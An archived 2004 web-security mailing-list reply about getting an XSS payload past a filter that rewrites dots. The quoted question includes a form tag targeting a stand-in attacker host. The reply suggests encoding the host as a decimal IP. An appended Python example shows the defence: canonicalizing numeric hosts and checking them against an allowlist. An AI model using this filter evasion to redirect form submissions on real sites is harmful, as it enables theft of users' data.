WebApp Sec mailing list archives
Re: Fullstop Substitution in XSS
From: Joseph Birr-Pixton <me () ifihada com>
Date: Tue, 01 Jun 2004 13:44:13 +0100
Calum Power wrote:
> My problem lies in the output of the form tags. Any:
> <form target="http://attacker.com/path/to/script">
> is of course being filtered into:
> <form target="http://attacker_com/path/to/script">
> Has anyone else had a similar problem? I've tried using hex and unicode
> encoding, to no avail (they get decoded before the filtering, obviously).
> Any help would be appreciated.
http://3639551331/search?q=decimal+ip+address

Oldest trick in the book :)

--
Joseph Birr-Pixton
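Added example, not part of the original thread: the reply shows that rewriting "." does not constrain where a URL points, so a defender has to parse the URL, canonicalize numeric hosts, and compare the result against an allowlist. The names `ALLOWED_HOSTS`, `parse_legacy_ipv4` and `classify_target` are hypothetical, and the example goes slightly beyond the decimal case in the reply by also canonicalizing hex, octal and short dotted forms.

```python
import ipaddress
import re
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"www.example.com"}  # hypothetical allowlist for this example

# One inet_aton-style number: 0x-prefixed hex, 0-prefixed octal, or decimal.
_NUM = re.compile(r"0x[0-9a-f]*|0[0-7]*|[1-9][0-9]*", re.IGNORECASE)

def parse_legacy_ipv4(host):
    """Return the dotted quad a numeric host resolves to, or None for a name."""
    parts = host.rstrip(".").split(".")
    if len(host) > 255 or not 1 <= len(parts) <= 4:
        return None
    if not all(_NUM.fullmatch(p) for p in parts):
        return None
    nums = []
    for p in parts:
        if p[:2].lower() == "0x":
            nums.append(int(p[2:] or "0", 16))
        elif len(p) > 1 and p[0] == "0":
            nums.append(int(p, 8))
        else:
            nums.append(int(p, 10))
    *head, last = nums
    # Leading parts are single octets; the last part fills the remaining bytes.
    if any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    value = last
    for i, n in enumerate(head):
        value += n << (8 * (3 - i))
    return str(ipaddress.IPv4Address(value))

def classify_target(url):
    """Return (kind, canonical_host, allowed) for a URL found in submitted markup."""
    host = urlsplit(url).hostname or ""
    ip = parse_legacy_ipv4(host)
    if ip is not None:
        return ("numeric-ip", ip, False)  # numeric hosts never match the allowlist
    return ("hostname", host, host in ALLOWED_HOSTS)

if __name__ == "__main__":
    for u in ["http://3639551331/search?q=decimal+ip+address",  # URL from the reply
              "http://attacker_com/path/to/script",  # filter output from the question
              "http://www.example.com/form"]:  # constructed
        print(u, "->", classify_target(u))
```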